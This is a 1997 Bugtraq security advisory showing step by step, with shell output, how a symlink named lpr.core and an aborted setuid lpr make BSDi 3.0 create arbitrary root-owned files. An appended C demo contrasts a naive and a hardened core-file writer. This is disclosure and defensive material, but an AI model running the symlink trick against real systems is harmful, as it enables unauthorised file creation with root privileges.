Bugtraq mailing list archives
Core file anomalies under BSDi 3.0
From: scorpios () CS HUJI AC IL (Nir Soffer)
Date: Thu, 19 Jun 1997 20:42:33 +0300
Well for starters, system information:

    BSD/OS beep.cs.huji.ac.il 3.0 BSDI BSD/OS 3.0 Kernel #2: Mon Mar 31 13:39:46 IDT 1997
        danny () sexta cs huji ac il:/usr/src/sys/compile/SEXTA i386

A small and neat bug in BSDi 3.x allows people to arbitrarily write files with crap for data, but not overwrite them. Like so:

Have a symbolic link, called [programname].core, to the desired file. The program must be setuid root.

    beep[ /tmp ] ls -la lpr.core
    lrwxrwxrwt  1 root  wheel  9 Jun 19 20:30 lpr.core@ -> /etc/TEST
    beep[ /tmp ]

Just to make sure that file doesn't exist:

    beep[ /tmp ] ls -la /etc/TEST
    ls: /etc/TEST: No such file or directory
    beep[ /tmp ]

Run the program. (In our case lpr is convenient since it waits for tty input and suspends itself.)

    beep[ /tmp ] lpr &
    [1] 27886
    beep[ /tmp ]
    [1] + Suspended (tty input)        lpr
    beep[ /tmp ]

Kill it with the ABRT signal.

    beep[ /tmp ] kill -ABRT %1
    beep[ /tmp ] fg
    lpr
    Abort (core dumped)
    beep[ /tmp ]

And voila:

    beep[ /tmp ] ls -la /etc/TEST
    -rw-------  1 root  wheel  184320 Jun 19 20:39 /etc/TEST
    beep[ /tmp ]

This exploit is similar to the Solaris 2.4 core exploit, with a few notable differences:

A.) BSDi doesn't give a damn that the euid != ruid, so finding a setgid program with privileges isn't necessary.
B.) BSDi _does_, however, check if the file exists, so it's quite impossible to overwrite files.
C.) BSDi _does_ change the permissions of the core dump to 600, and it keeps on being owned by root, so changing the file is impossible as well.

Regards, Nir.

--
Nir Soffer AKA ScorpioS, scorpios () cs huji ac il .
USER, n.: The word computer professionals use when they mean "idiot."
    -- Dave Barry, "Claw Your Way to the Top"
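As an added illustration (not part of Nir's post or of BSDi's kernel code), the mechanism behind the report and its fix side by side: a core writer that opens its path with O_CREAT|O_TRUNC follows a dangling symlink and creates the target, while one that opens with O_CREAT|O_EXCL is required by POSIX to fail with EEXIST whenever the last path component is a symlink, dangling or not. The scratch directory and the names prog.core and victim are constructed for the demonstration; it needs a writable /tmp.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Naive core writer: open(2) with O_CREAT|O_TRUNC follows a dangling
 * symlink and creates its target, which is the behaviour reported above.
 * Returns 1 if the symlink target got created, 0 otherwise. */
static int write_core_naive(const char *core_path, const char *target) {
    int fd = open(core_path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd >= 0) { if (write(fd, "core", 4) < 0) { /* ignore */ } close(fd); }
    return access(target, F_OK) == 0;
}

/* Hardened core writer: O_CREAT|O_EXCL fails with EEXIST when core_path
 * is a symlink, even one pointing at a file that does not exist yet, so
 * the target is never created. Returns 1 if the target got created. */
static int write_core_safe(const char *core_path, const char *target) {
    int fd = open(core_path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd >= 0) { if (write(fd, "core", 4) < 0) { /* ignore */ } close(fd); }
    else if (errno != EEXIST) perror("open");
    return access(target, F_OK) == 0;
}

/* Hypothetical harness: build a scratch dir holding the dangling symlink
 * prog.core -> <dir>/victim, run one writer, report whether victim
 * appeared, then clean up. Returns 1 (created), 0 (not), -1 (setup error). */
int core_symlink_creates_target(int use_safe) {
    char dir[] = "/tmp/coretestXXXXXX";
    if (!mkdtemp(dir)) return -1;
    char link[256], target[256];
    snprintf(link, sizeof link, "%s/prog.core", dir);
    snprintf(target, sizeof target, "%s/victim", dir);
    if (symlink(target, link) != 0) { rmdir(dir); return -1; }
    int created = use_safe ? write_core_safe(link, target)
                           : write_core_naive(link, target);
    unlink(target); unlink(link); rmdir(dir);
    return created;
}

int main(void) {
    printf("O_TRUNC open creates symlink target: %d\n", core_symlink_creates_target(0));
    printf("O_EXCL  open creates symlink target: %d\n", core_symlink_creates_target(1));
    return 0;
}
```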